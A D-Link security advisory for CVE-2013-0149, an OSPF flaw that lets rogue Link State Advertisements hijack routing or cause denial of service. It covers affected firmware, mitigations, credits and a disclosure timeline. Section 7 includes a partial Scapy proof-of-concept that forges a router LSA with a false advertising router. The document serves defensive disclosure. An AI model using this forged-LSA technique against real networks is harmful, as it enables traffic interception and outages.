Notified: May 28, 2013 Updated: August 05, 2013
Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release
Remotely Exploitable: Possible, but would require access via other product (s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149
The Open Shortest Path First (OSPF) protocol does not specify unique Link State
Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or
conduct a Denial of Service (DoS) attack.
This vulnerability can allow an attacker to re-route traffic through their own router,
compromising the confidentiality of the data, or to conduct a Denial of Service attack
against a router, dropping all traffic.
The following is the list of known affected devices and the associated firmware
(confirmed by D-Link). This will be updated as needed if additional units effected.
1. DES-3810-28 – R2.20.B017 (HW Not available in the US)
5.VendorInformation, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this
vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
being subject to this attack.
D-Link is working to reduce the potential impact of this vulnerability, which is a result of
an ambiguous standard. Currently we advise the following:
As always, adhering to best practices will be the strongest defense against attacks. As
long as your physical devices, networks, and protocols are secured, it will be very
difficult for an attacker to insert a rogue LSA to initiate this type of attack.
First, this vulnerability does not defeat cryptographic (MD5) authentication, we
recommend a strong MD5 authentication key as your best defense.
We also recommend that administrators enable the OSPF passive interface feature to
stop sending or receiving routing table updates on interfaces that do not participate in
Finally, we recommend that networks use MAC-based Access Control (MAC) to
authenticate devices before they are able to communicate with the network. The MAC
feature is a client-less design so there is no need to install extra software on a user’s
computer, and ensures that only devices on a whitelist will have access to the network.
When used in conjunction with common security best practices, it can help to strongly
limit the possible vectors of attack.
D-Link is monitoring the situation for an update to the standard that can be implemented
to protect potentially affected devices.
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with forementioned
7.Technical Description / Proof of Concept Code
7.1.OSPF 𠇏ight Back” is triggered by LSAs with matching Router ID only, and so can
be evaded by using non matching Router ID and Link State ID on a rogue LSA. Routing
lookup uses only the Link State ID field, and so may, depending on implementation,
result in selecting the rogue LSA before the valid LSA.
scappy proof of concept attack script
attacker_source_ip = "192.168.13.1"
attacker_router_id = "192.168.18.1"
victim_destination_ip = "192.168.13.3"
victim_router_id = "192.168.37.3"
false_adv_router = "192.168.27.11"
seq_num = 0x80000004L
R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
seq=seq_num, linklist=[ \
OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1), \
OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1), \
OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3) \
• May 28, 2013 – Notification by Cert of the issue
• May 28, 2013 – Notify Qualified D-Link Resources of issue
• June 6, 2013 – Cert notified embargo date changed to July 30
• Jun 6, 2013 – D-Link Request Cert to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – Cert notified embargo date changed to Aug 1
• July 29, 2013 – D-Link Sends Vulnerability Response Report to Cert
• July 30, 2013 – D-Link Post Report for effected Products
 CVE-229804-2013.pdf – Owning the Routing Table Part II
D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
implements and supports unified network solutions that integrate capabilities in switching, wireless,
broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
Copyright © 2013. D-Link. All Rights Reserved.
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com
Please see DLINK-2013-VUL0213.